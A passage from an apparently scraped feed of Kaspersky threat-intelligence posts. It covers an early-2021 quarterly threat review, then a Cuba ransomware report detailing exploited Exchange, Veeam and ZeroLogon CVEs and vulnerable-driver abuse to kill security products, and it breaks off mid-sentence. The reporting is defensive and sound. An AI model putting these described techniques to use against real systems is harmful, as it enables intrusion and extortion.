QuasarRAT.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/25134233/APT10_and_the_A41_APT_campaign_14.png>)The operations and implants of the campaign are remarkably stealthy, making it difficult to track the threat actor's activities. The threat actor behind the campaign implements several measures to conceal itself and make it more difficult to analyze. Most of the malware families used in the campaign are fileless malware and have not been seen before.\n\nWe believe that the most significant aspect of the Ecipekac malware is that the encrypted shellcodes are inserted into digitally signed DLLs without affecting the validity of the digital signature.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/25132856/APT10_and_the_A41_APT_campaign_05.png>)\n\nWhen this technique is used, some security solutions cannot detect these implants. Judging from the main features of the P8RAT and SodaMaster backdoors, we believe these modules are downloaders responsible for downloading further malware which we have so far been unable to obtain.\n\nYou can find out more about the campaign [here](<https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/>).\n\n## Other malware\n\n### Fake ad blocker, with miner included\n\nSome time ago, we discovered a number of fake applications being used to deliver a Monero crypto-currency miner to target computers. The fake programs are distributed through malicious websites that may be listed in the victim's search results. We believe this is a continuation of [a campaign last summer, reported by Avast](<https://blog.avast.com/fake-malwarebytes-installation-files-distributing-coinminer>), in which the malware masqueraded as the Malwarebytes antivirus installer. In [the latest campaign](<https://securelist.com/ad-blocker-with-miner-included/101105/>), we observed the malware impersonating several applications: the ad blockers AdShield and Netshield, as well as the OpenDNS service.\n\nOnce the victim has started the program, it changes the DNS settings on the device so that all domains are resolved through the attackers' servers: this prevents the victim from accessing certain antivirus sites. The malware then updates itself: the update also downloads and runs a modified Transmission torrent client, which sends the ID of the targeted computer, along with installation details, to the C2 server. It then downloads and installs the miner.\n\nData from Kaspersky Security Network showed that, from February 2021 until the time we published our report, there were attempts to install fake applications on the devices of more than 7,000 people. At the peak of the current campaign, more than 2,500 people were attacked each day, with most victims located in Russia and CIS countries. \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/05122816/01-en-ru-fake-adshield-miner-diagram.png>)\n\n### Ransomware encrypting virtual hard disks\n\nRansomware gangs are exploiting vulnerabilities in VMware ESXi to target virtual hard disks and encrypt the data stored on them. The ESXi hypervisor lets multiple virtual machines store information on a single server using the SLP (Service Layer Protocol).\n\nThe first vulnerability ([CVE-2019-5544](<https://www.vmware.com/security/advisories/VMSA-2019-0022.html>)) can be used to carry out [heap overflow attacks](<https://encyclopedia.kaspersky.com/glossary/heap-overflow-attack/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). The second ([CVE-2020-3992](<https://www.vmware.com/security/advisories/VMSA-2020-0023.html>)) is a [Use-After-Free (UAF) vulnerability](<https://encyclopedia.kaspersky.com/glossary/use-after-free/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) related to the incorrect use of dynamic memory during program operation. Once attackers have been able to gain an initial foothold in the target network, they can use the vulnerabilities to generate malicious SLP requests and compromise data storage.\n\nThe vulnerabilities are being exploited by [RansomExx](<https://www.kaspersky.com/blog/ransomware-in-virtual-environment/39150/>). The [Darkside](<https://www.infosecurity-magazine.com/news/darkside-20-ransomware-fastest/>) group is reportedly using the same approach; and the attackers behind the [BabuLocker Trojan](<https://twitter.com/campuscodi/status/1354237766285012992>) have also hinted that they are able to encrypt ESXi.\n\n### macOS developments\n\nTowards the end of last year, Apple unveiled machines powered by its own M1 chip, designed to replace Intel's processors in its computers. The Apple M1, a direct relative of the processors used in the iPhone and iPad, will ultimately allow Apple to unify its software under a single architecture.\n\nJust a few months after the release of the first Apple M1 computers, malware writers had already recompiled their code to adapt it to the new architecture.\n\nThese include the developers of XCSSET, malware [first discovered last year](<https://www.trendmicro.com/en_us/research/20/h/xcsset-mac-malware--infects-xcode-projects--uses-0-days.html>), which targets Mac developers by injecting a malicious payload into Xcode IDE projects on the victim's Mac. This payload is subsequently executed during the building of project files in Xcode. XCSSET modules are able to read and dump Safari cookies, inject malicious JavaScript code into various websites, steal files and information from applications such as Notes, WeChat, Skype, Telegram and others, and encrypt files. The samples we have observed include some compiled specifically for the Apple Silicon chips.\n\nSilver Sparrow is [another new threat](<https://redcanary.com/blog/clipping-silver-sparrows-wings/>) that targets the M1 chip. This malware introduces a new way for malware writers to abuse the default packaging functionality: instead of placing a malicious payload inside pre-install or post-install scripts, they hid one in the Distribution XML file. This payload uses JavaScript API to run bash commands in order to download a JSON configuration file. The sample extracts a URL from the "downloadURL" field for the next download. An appropriate Launch Agent is also created for persistent execution of the malicious sample. The JavaScript payload can be executed regardless of chip architecture, but analysis of the package file makes it clear that it supports both Intel and M1 chips.\n\nMost malicious objects detected for the macOS platform are adware. The developers of these programs are also updating their code to include support for the M1 chip, including the Pirrit and Bnodlero families.\n\nYou can find technical details, along with our FAQ on M1 threats, [here](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).\n\nCybercriminals don't just add support for new platforms: sometimes they use new programming languages to develop their 'products'. Recently, macOS adware developers have been paying more attention to new languages, apparently in the hope that such code will be more opaque to virus analysts who have little or no experience with the newer languages. We have already seen quite a few samples written in Go, and recently cybercriminals have turned their attention to Rust as well. You can read our analysis of a new adware program called Convuster [here](<https://securelist.com/convuster-macos-adware-in-rust/101258/>).\n\n### Secondhand news\n\nThere's a strong market in secondhand computing devices. Some of our researchers recently looked at [the security implications of buying and selling secondhand devices](<https://www.kaspersky.com/blog/data-on-used-devices/38610/>): their aim was to see what traces are left behind on laptops and other storage data when people sell them.\n\nThe overwhelming majority of the devices we investigated contained at least some traces of data \u2013 mostly personal but some corporate. Researchers were able to access data on more than 16% of the devices outright. A further 74% contained data that could be recovered using [file-carving](<https://en.wikipedia.org/wiki/File_carving>) methods. Only 11% of devices had been wiped properly.\n\nThe data recovered ranged from the harmless to revealing and even dangerous: calendar entries, meeting notes, access data for corporate resources, internal business documents, personal photos, medical information, tax documents and more. Some of the data could be used directly \u2013 for example, contact information, tax documents and medical records (or access to them through saved passwords). Other data could lead to indirect damage if exploited by cybercriminals.\n\nAside from the data that could be exposed, there's also a risk that malware left on a device could infect the new owner. We found malware on 17% of the devices we looked at.\n\nSellers need to consider what traces they might leave behind when they sell a device; and buyers need to think about the security of any secondhand device they buy.\n\nThe UK National Cyber Security Centre (NCSC) provides good [practical advice for buyers and sellers](<https://www.ncsc.gov.uk/guidance/buying-selling-second-hand-devices>).\n\n### Stalkerware during the pandemic\n\n[Stalkerware](<https://csr.kaspersky.com/en/antistalking/eng.html>) is commercially available software used to spy on another person via their device, without that person's knowledge or consent. Stalkerware is the digital tip of a very real-world iceberg. In a 2017 report, the European Institute for Gender Equality indicates that seven out of 10 women affected by online stalking have experienced physical violence at the hands of the perpetrator. The [Coalition Against Stalkerware](<https://stopstalkerware.org/>) defines stalkerware as software which "may facilitate intimate partner surveillance, harassment, abuse, stalking, and/or violence".\n\nThe number of people affected by stalkerware has been growing in recent years. We saw a fall in numbers in 2020, the drop-off coinciding with the worldwide lockdowns that came in the wake of the COVID-19 pandemic. This is hardly surprising: since stalking is typically carried out by someone the target lives with, if both abuser and target are housebound, there is less need to use technology to track someone's activities. Notwithstanding the _relative_ decline, 53,870 is a big number. Moreover, these are numbers of Kaspersky customers: no doubt the real figure is considerably higher.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/26124943/01-en-stalkerware-report.png>)The most commonly detected stalkerware sample in 2020 was Monitor.AndroidOS.Nidb.a. This app is re-sold under other names, so it is prominent in the market \u2013 iSpyoo, TheTruthSpy and Copy9 apps are all part of this family. Another popular application is Cerberus, which is sold as anti-theft smartphone protection and hides itself to avoid notice. Like genuine phone-finding apps, Cerberus has access to geo-location, can take photos and screenshots and record sound. Other high-ranking stalking apps include Track My Phone (which we detect as Agent.af), MobileTracker and Anlost.\n\n**Top 10 most detected stalkerware samples globally**\n\n| Samples | Affected users \n---|---|--- \n1 | Monitor.AndroidOS.Nidb.a | 8147 \n2 | Monitor.AndroidOS.Cerberus.a | 5429 \n3 | Monitor.AndroidOS.Agent.af | 2727 \n4 | Monitor.AndroidOS.Anlost.a | 2234 \n5 | Monitor.AndroidOS.MobileTracker.c | 2161 \n6 | Monitor.AndroidOS.PhoneSpy.b | 1774 \n7 | Monitor.AndroidOS.Agent.hb | 1463 \n8 | Monitor.AndroidOS.Cerberus.b | 1310 \n9 | Monitor.AndroidOS.Reptilic.a | 1302 \n10 | Monitor.AndroidOS.SecretCam.a | 1124 \n \nThe greatest number of stalkerware detections occurred in Russia, Brazil and the US.\n\n**Top 10 most affected countries by stalkerware \u2013 globally**\n\n| Country | Affected users \n---|---|--- \n1 | Russian Federation | 12389 \n2 | Brazil | 6523 \n3 | United States of America | 4745 \n4 | India | 4627 \n5 | Mexico | 1570 \n6 | Germany | 1547 \n7 | Iran | 1345 \n8 | Italy | 1144 \n9 | United Kingdom | 1009 \n10 | Saudi Arabia | 968 \n \nYou can read our full report on the subject [here](<https://securelist.com/the-state-of-stalkerware-in-2020/100875/>).\n\nStalkerware operates stealthily, so it's difficult for anyone targeted with such programs to see that it's installed on their device \u2013 they hide the app's icon and remove other traces of their presence.\n\nKaspersky is actively working to end the use of stalkerware, not just by detecting it but by working with partners. In 2019, Kaspersky and nine other founding members created the [Coalition Against Stalkerware](<https://stopstalkerware.org/>). Last year, we created [TinyCheck](<https://github.com/KasperskyLab/TinyCheck>), a free tool to detect stalkerware on mobile devices \u2013 specifically for service organizations working with people facing domestic violence. We are one of five partners in an EU-wide project aimed at tackling gender-based cyber-violence and stalkerware called DeStalk, which the European Commission chose to support with its Rights, Equality and Citizenship Program.\n\n### Doxing in the corporate sector\n\nWhen most people think of [doxing](<https://encyclopedia.kaspersky.com/glossary/doxxing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), they tend to think it applies only to celebrities and other high-profile people. However, confidential corporate information is no less sensitive; and the financial and reputational impact resulting from the disclosure of such data means that any organization could become a victim of doxing. This is clear, for example, from the fact that several ransomware gangs now threaten to leak stolen corporate data to increase the likelihood that their victims will pay up.\n\nCybercriminals use a variety of methods to gather confidential corporate information.\n\nOne of the easiest approaches is to use open-source intelligence (OSINT) \u2013 that is, gathering data from publicly accessible sources. The internet provides a lot of helpful information to would-be attackers, including the names and positions of employees, including those who occupy key positions in the company: for example, the CEO, HR director and chief financial officer.\n\nInformation harvested from the online personal profiles of employees can be used to set up [BEC](<https://encyclopedia.kaspersky.com/glossary/bec/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (Business Email Compromise) attacks, in which an attacker initiates email correspondence with a member of staff by posing as a different employee (including their superior) or as a representative of a partner company. The attacker does this to gain the trust of the target before persuading them to perform certain actions, such as sending confidential data or transferring funds to an account controlled by the attacker.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26124957/Corporate_doxing_01.png>)\n\nBEC attacks can also be used to collect further information about the company, or to gain access to valuable corporate data, or access to company resources \u2013 for example, credentials allowing access to cloud-based systems. \nThere are various technical tricks that cybercriminals use to obtain information relevant to their particular goals, including sending [email messages containing a tracking pixel](<https://www.kaspersky.com/blog/tracking-pixel-bec/36976/>) \u2013 often disguised as a "test" message.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26125040/Corporate_doxing_02.png>)\n\nThis enables attackers to obtain data such as the time the email was opened, the version of the recipient's mail client and the IP address. This data lets the attackers build a profile on a specific person who they can then impersonate in subsequent attacks.\n\nPhishing continues to be an effective way for attackers to gather corporate data. For example, they may send an employee a message that mimics a notification from a business platform such as SharePoint, which contains a link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26125148/Corporate_doxing_04.jpg>)\n\nIf the employee clicks the link, they are redirected to a spoofed website containing a fraudulent form for entering their corporate account credentials \u2013 data which is captured by the attackers.\n\nSometimes cybercriminals resort to phone phishing \u2013 either by calling an employee directly and trying to "phish" corporate information, or sending a message and asking them to call the number given in the message. One way to trick employees is to pose as IT support staff \u2013 this method was used in the [Twitter hack](<https://www.dfs.ny.gov/Twitter_Report>) in July 2020.\n\n> By obtaining employee credentials, they were able to target specific employees who had access to our account support tools. They then targeted 130 Twitter accounts - Tweeting from 45, accessing the DM inbox of 36, and downloading the Twitter Data of 7.\n> \n> -- Twitter Support (@TwitterSupport) [July 31, 2020](<https://twitter.com/TwitterSupport/status/1289000208701878272?ref_src=twsrc%5Etfw>)\n\nAttackers may not confine themselves to gathering publicly available data, but may also hack an employee's account. This could be used to gain a foothold in the company, from which they can extend their activities, or to circulate false information that could damage the company's reputation and result in financial loss. There has even been a case where cybercriminals have obtained audio and video content of the CEO of an international company and [used deepfake technology to imitate the CEO's voice](<https://www.kaspersky.com/blog/machine-learning-fake-voice/28870/>), using it to persuade the management team of one of the company's branches to transfer money to the scammers.\n\nYou can read our full report on doxing, including tips on how to protect yourself, [here](<https://securelist.com/corporate-doxing/101513/>).", "cvss3": {}, "published": "2021-05-31T10:00:37", "type": "securelist", "title": "IT threat evolution Q1 2021", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-5544", "CVE-2020-3992", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-31T10:00:37", "id": "SECURELIST:A823F31C04C74DD103337324E6D218C9", "href": "https://securelist.com/it-threat-evolution-q1-2021/102382/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-17T09:24:48", "description": "\n\n## Introduction\n\nKnowledge is our best weapon in the fight against cybercrime. An understanding of how various gangs operate and what tools they use helps build competent defenses and investigate incidents. This report takes a close look at the history of the Cuba group, and their attack tactics, techniques and procedures. We hope this article will help you to stay one step ahead of threats like this one.\n\n## Cuba ransomware gang\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08140902/Cuba_ransomware_01.png>)\n\nCuba data leak site\n\nThe group's offensives first got on our radar in late 2020. Back then, the cybercriminals had not yet adopted the moniker "Cuba"; they were known as "Tropical Scorpius".\n\nCuba mostly targets organizations in the United States, Canada and Europe. The gang has scored a series of resonant attacks on oil companies, [financial services](<https://www.bleepingcomputer.com/news/security/us-cities-disclose-data-breaches-after-vendors-ransomware-attack/>), [government agencies](<https://techcrunch.com/2022/08/31/montenegro-ransomware-attack-embassy-warning/>) and healthcare providers.\n\nAs with most cyberextortionists lately, the Cuba gang encrypts victims' files and demands a ransom in exchange for a decryption key. The gang infamously uses complex tactics and techniques to penetrate victim networks, such as exploitation of software vulnerabilities and social engineering. They have been known to use compromised remote desktop (RDP) connections for initial access.\n\nThe Cuba gang's exact origins and the identities of its members are unknown, although some researchers believe it might be a successor to another ill-famed extortion gang, Babuk. The Cuba group, like many others of its kind, is a ransomware-as-a-service (RaaS) outfit, letting its partners use the ransomware and associated infrastructure in exchange for a share of any ransom they collect.\n\nThe group has changed names several times since its inception. We are currently aware of the following aliases it has used:\n\n * ColdDraw\n * Tropical Scorpius\n * Fidel\n * Cuba\n\nThis past February, we came across another name for the gang \u2014 "V Is Vendetta", which deviated from the hackers' favorite Cuban theme. This might have been a moniker used by a sub-group or affiliate.\n\nThere is an obvious connection with the Cuba gang: the newly discovered group's website is hosted in the Cuba domain:\n\n_http[:]//test[.]cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd[.]onion/_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08140959/Cuba_ransomware_02.png>)\n\nWebsite of V IS VENDETTA\n\nCuba remains active as at the time of writing this, and we keep hearing about new extortion victims.\n\n## Victimology\n\n_In this section, we used data consensually provided by our users and information about victims from open sources, such as other security vendors' reports and the data leak site of the ransomware gang itself._\n\nThe group has attacked numerous companies around the world. Industry affiliation does not seem to be a factor: victims have included retailers, financial and logistical services, government agencies, manufacturers, and others. In terms of geography, most of the attacked companies have been located in the United States, but there have been victims in Canada, Europe, Asia and Australia.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141048/Cuba_ransomware_03.png>)\n\nGeographic distribution of Cuba victims\n\n## Ransomware\n\nThe Cuba ransomware is a single file without additional libraries. Samples often have a forged compilation timestamp: those found in 2020 were stamped with June 4, 2020, and more recent ones, June 19th, 1992.\n\n## Cuba extortion model\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141130/Cuba_ransomware_04.png>)\n\nExtortion models\n\nFour extortion models exist today in terms of tools used for pressuring the victim.\n\n * Single extortion: encrypting data and demanding a ransom just for decryption.\n * Double extortion: besides encrypting, attackers steal sensitive information. They threaten to both withhold the encryption key and publish the stolen information online unless the victim pays up. This is the most popular model among ransomware gangs today.\n * Triple extortion: adding a threat to expose the victim's internal infrastructure to DDoS attacks. The model became widespread after the LockBit gang got [DDoS'ed](<https://techcrunch.com/2022/08/22/entrust-lockbit-ddos-ransomware/>), possibly by a victim. After getting targeted, the hackers realized that DDoS was an effective pressure tool, something they [stated openly](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/>), setting an example for others. To be fair, [isolated cases of triple extortion](<https://www.bleepingcomputer.com/news/security/ransomware-gangs-add-ddos-attacks-to-their-extortion-arsenal/>) predate the LockBit case.\n * The fourth model is the least common one, as it implies maximum pressure and is thus more costly. It adds spreading news of the breach among the victim's investors, shareholders and customers. DDoS attacks in that case are not necessary. This model is exemplified by the recent [hack of Bluefield University in Virginia](<https://www.bleepingcomputer.com/news/security/ransomware-gang-hijacks-university-alert-system-to-issue-threats/>), where the AvosLocker ransomware gang hijacked the school's emergency broadcast system to send students and staff SMS texts and email alerts that their personal data had been stolen. The hackers urged not to trust the school's management, who they said were concealing the true scale of the breach, and to make the situation public knowledge as soon as possible.\n\nThe Cuba group is using the classic double extortion model, encrypting data with the Xsalsa20 symmetric algorithm, and the encryption key, with the RSA-2048 asymmetric algorithm. This is known as hybrid encryption, a cryptographically secure method that prevents decryption without the key.\n\nCuba ransomware samples avoid encrypting files with the following name extensions: .exe, .dll, .sys, .ini, .lnk, .vbm and .cuba, and the following folders:\n\n * \\windows\\\n * \\program files\\microsoft office\\\n * \\program files (x86)\\microsoft office\\\n * \\program files\\avs\\\n * \\program files (x86)\\avs\\\n * \\$recycle.bin\\\n * \\boot\\\n * \\recovery\\\n * \\system volume information\\\n * \\msocache\\\n * \\users\\all users\\\n * \\users\\default user\\\n * \\users\\default\\\n * \\temp\\\n * \\inetcache\\\n * \\google\\\n\nThe ransomware saves time by searching for, and encrypting, Microsoft Office documents, images, archives and others in the %AppData%\\Microsoft\\Windows\\Recent\\ directory, rather than all files on the device. It also terminates all SQL services to encrypt any available databases. It looks for data both locally and inside network shares.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141209/Cuba_ransomware_05.png>)\n\nList of services that the Cuba ransomware terminates\n\nBesides encrypting, the group steals sensitive data that it discovers inside the victim's organization. The type of data that the hackers are after depends on the industry that the target company is active in, but in most cases, they exfiltrate the following:\n\n * Financial documents\n * Bank statements\n * Company accounts details\n * Source code, if the company is a software developer\n\n## Arsenal\n\nThe group employs both well-known, "classic" credential access tools, such as mimikatz, and self-written applications. It exploits vulnerabilities in software used by the victim companies: mostly known issues, such as the combination of [ProxyShell](<https://www.computerweekly.com/news/252505767/Half-of-MS-Exchange-servers-at-risk-in-ProxyShell-debacle>) and [ProxyLogon](<https://www.computerweekly.com/news/252497200/Emergency-patch-addresses-MS-Exchange-Server-zero-days>) for attacking Exchange servers, and security holes in the Veeam data backup and recovery service.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141240/Cuba_ransomware_06.png>)\n\n**Malware**\n\n * Bughatch\n * Burntcigar\n * Cobeacon\n * Hancitor (Chanitor)\n * Termite\n * SystemBC\n * Veeamp\n * Wedgecut\n * RomCOM RAT\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141310/Cuba_ransomware_07.png>)\n\n**Tools**\n\n * Mimikatz\n * PowerShell\n * PsExec\n * Remote Desktop Protocol\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141345/Cuba_ransomware_08.png>)\n\n**Vulnerabilities**\n\nProxyShell:\n\n * CVE-2021-31207\n * CVE-2021-34473\n * CVE-2021-34523\n\nProxyLogon:\n\n * CVE-2021-26855\n * CVE-2021-26857\n * CVE-2021-26858\n * CVE-2021-27065\n\nVeeam vulnerabilities:\n\n * [CVE-2022-26501](<https://vulners.com/cve/CVE-2022-26501>)\n * [CVE-2022-26504](<https://vulners.com/cve/CVE-2022-26504>)\n * [CVE-2022-26500](<https://vulners.com/cve/CVE-2022-26500>)\n\n[ZeroLogon](<https://en.wikipedia.org/wiki/Zerologon>):\n\n * CVE-2020-1472\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141416/Cuba_ransomware_09.png>)\n\nMapping of the attack arsenal to MITRE ATT&CK\u00ae tactics\n\n## Profits\n\nThe incoming and outgoing payments in the bitcoin wallets whose identifiers the hackers provide in their ransom notes exceed a total of 3,600 BTC, or more than $103,000,000 converted at the rate of $28,624 for 1 BTC. The gang owns numerous wallets, constantly transferring funds between these, and uses bitcoin mixers: services that send bitcoins through a series of anonymous transactions to make the origin of the funds harder to trace.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141450/Cuba_ransomware_10.png>)\n\nPart of the transaction tree in the BTC network\n\n## Investigation of a Cuba-related incident and analysis of the malware\n\n### Host: SRV_STORAGE\n\nOn December 19, we spotted suspicious activity on a customer host, which we will refer to as "SRV_STORAGE" in this report. Telemetry data showed three suspicious new files:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141536/Cuba_ransomware_11.png>)\n\nSuspicious events in the telemetry data as discovered by the Kaspersky SOC\n\nAn analysis of kk65.bat suggested that it served as a stager that initiated all further activity by starting rundll32 and loading the komar65 library into it, which runs the callback function DLLGetClassObjectGuid.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141606/Cuba_ransomware_12.png>)\n\nContents of the .bat file that we found\n\nLet us take a look inside the suspicious DLL.\n\n#### Bughatch\n\nThe komar65.dll library is also known as "Bughatch", a name it was given in a [report](<https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware>) by Mandiant.\n\nThe first thing that caught our attention was the path to the PDB file. There's a folder named "mosquito" in it, which translates into Russian as "komar". The latter is a part of the DDL name suggesting the gang may include Russian speakers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141652/Cuba_ransomware_13.png>)\n\nPath to the komar65.dll PDB file\n\nThe DLL code presents Mozilla/4.0 as the user agent when connecting to the following two addresses:\n\n * com, apparently used for checking external connectivity\n * The gang's command-and-control center. The malware will try calling home if the initial ping goes through.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141743/Cuba_ransomware_14.png>)\n\nAnalysis of komar65.dll\n\nThis is the kind of activity we observed on the infected host. After Bughatch successfully established a connection with the C2 server, it began collecting data on network resources.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141821/Cuba_ransomware_15.png>)\n\nBughatch activity\n\nLooking into the C2 servers, we found that in addition to Bughatch, these spread modules that extend the malware's functionality. One of those collects information from the infected system and sends it back to the server in the form of an HTTP POST request.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141859/Cuba_ransomware_16.jpeg>)\n\nFiles we found on the Cuba C2 servers\n\nOne could think of Bughatch as a backdoor of sorts, deployed inside the process memory and executing a shellcode block within the space it was allocated with the help of Windows APIs (VirtualAlloc, CreateThread, WaitForSingleObject), to then connect to the C2 and await further instructions. In particular, the C2 may send a command to download further malware, such as Cobalt Strike Beacon, Metasploit, or further Bughatch modules.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08141930/Cuba_ransomware_17.png>)\n\nBughatch operating diagram\n\n### SRV_Service host\n\n#### Veeamp\n\nAfter some time, we found a malicious process started on a neighboring host; we dubbed this "SRV_Service":\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142027/Cuba_ransomware_18.png>)\n\nMalicious process starting\n\n**Veeamp.exe **is a custom-built data dumper written in C#, which leverages security flaws in the Veeam backup and recovery service to connect to the VeeamBackup SQL database and grab account credentials.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142101/Cuba_ransomware_19.png>)\n\nAnalysis of Veeamp\n\n**Veeamp **exploits the following Veeam vulnerabilities: CVE-2022-26500, CVE-2022-26501, CVE-2022-26504. The first two allow an unauthenticated user to remotely execute arbitrary code, and the third one, lets domain users do the same. After any of the three are exploited, the malware outputs the following in the control panel:\n\n * User name\n * Encrypted password\n * Decrypted password\n * User description in the Credentials table of Veeam: group membership, permissions and so on\n\nThe malware is not exclusive to the Cuba gang. We spotted it also in attacks by other groups, such as Conti and [Yanluowang](<https://securelist.com/how-to-recover-files-encrypted-by-yanluowang/106332/>).\n\nActivity we saw on SRV_Service after Veeamp finished its job was similar to what we had observed on SRV_STORAGE with Bughatch:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08142319/Cuba_ransomware_20.png>)\n\nBughatch activity on SRV_Service\n\nAs was the case with SRV_STORAGE, the malware dropped three files into the temp folder, and then executed these in the same order, connecting to the same addresses.\n\n#### Avast Anti-Rootkit driver\n\nAfter Bughatch successfully established a connection to its C2, we watched as the group used an increasingly popular technique: Bring Your Own Vulnerable Driver (BYOVD).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153116/Cuba_ransomware_21.png>)\n\nExploiting a vulnerable driver\n\nThe malicious actors install the vulnerable driver in the system and subsequently use it to various ends, such as terminating processes or evading defenses through privilege escalation to kernel level.\n\nHackers are drawn to vulnerable drivers because they all run in kernel mode, with a high level of system access. Besides, a legitimate driver with a digital signature will not raise any red flags with security systems, helping the attackers to stay undetected for longer.\n\nDuring the attack, the malware created three files in the temp folder:\n\n * **aswarpot.sys**: a legitimate anti-rootkit driver by Avast that has two vulnerabilities: [CVE-2022-26522](<https://vulners.com/cve/CVE-2022-26522>) and [CVE-2022-26523](<https://vulners.com/cve/CVE-2022-26523>), which allow a user with limited permissions to run code at kernel level.\n * **KK.exe**: malware known as Burntcigar. The file we found was a new variety that used the flawed driver to terminate processes.\n * **av.bat** batch script: a stager that helps the kernel service to run the Avast driver and executes Burntcigar.\n\nAnalysis of the BAT file and telemetry data suggests that av.bat uses the sc.exe utility to create a service named "aswSP_ArPot2", specifying the path to the driver in the \u0421\\windows\\temp\\ directory and the service type as kernel service. The BAT file then starts the service with the help of the same sc.exe utility and runs KK.exe, which connects to the vulnerable driver.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153226/Cuba_ransomware_22.png>)\n\nContents of the .bat file that we found\n\n#### Burntcigar\n\nThe first thing we noticed while looking into Burntcigar was the path to the PDB file, which contained a folder curiously named "Musor" (the Russian for "trash"), more indication that the members of the Cuba gang may speak Russian.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153308/Cuba_ransomware_23.png>)\n\nPath to the KK.exe PDB file\n\nWe further discovered that the sample at hand was a new version of Burntcigar, undetectable by security systems at the time of the incident. The hackers had apparently updated the malware, as in the wake of previous attacks, many vendors were able to easily detect the logic run by older versions.\n\nYou may have noticed that in the screenshot of our sample below, all data about processes to be terminated is encrypted, whereas older versions openly displayed the names of all processes that the attackers wanted stopped.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153352/Cuba_ransomware_24.png>)\n\nComparison between the old and new version of Burntcigar\n\nThe malware searches for process names that suggest a relation to popular AV or EDR products and adds their process IDs to the stack to terminate later.\n\nBurntcigar uses the DeviceIoContol function to access the vulnerable Avast driver, specifying the location of the code that contains the security issue as an execution option. The piece of code contains the ZwTerminateProcess function, which the attackers use for terminating processes.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153438/Cuba_ransomware_25.png>)\n\nAnalysis of Burntcigar\n\nFortunately, our product's self-defense was able to cope with the malware by blocking all hooks to the driver.\n\nLater, we discovered similar activity exploiting the Avast anti-rootkit driver on the Exchange server and the SRV_STORAGE host. In both cases, the attackers used a BAT file to install the insecure driver and then start Burntcigar.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153516/Cuba_ransomware_26.png>)\n\nBurntcigar activity on the neighboring hosts\n\n### SRV_MAIL host (Exchange server)\n\nOn December 20, the customer granted our request to add the Exchange server to the scope of monitoring. The host must have been used as an entry point to the customer network, as the server was missing critical updates, and it was susceptible to most of the group's initial access vectors. In particular, SRV_MAIL had the ProxyLogon, ProxyShell and Zerologon vulnerabilities still unremediated. This is why we believe that the attackers penetrated the customer network through the Exchange server.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153603/Cuba_ransomware_27.png>)\n\nTelemetry data starts coming in\n\nOn SRV_MAIL, the SqlDbAdmin user showed the same kind of activity as that which we had observed on the previous hosts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153645/Cuba_ransomware_28.png>)\n\nMalicious activity by SqlDbAdmin\n\nWe found that the attackers were using the legitimate gotoassistui.exe tool for transferring malicious files between the infected hosts.\n\nGoToAssist is an RDP support utility often used by technical support teams, but the application is often abused to bypass any security defenses or response teams when moving files between 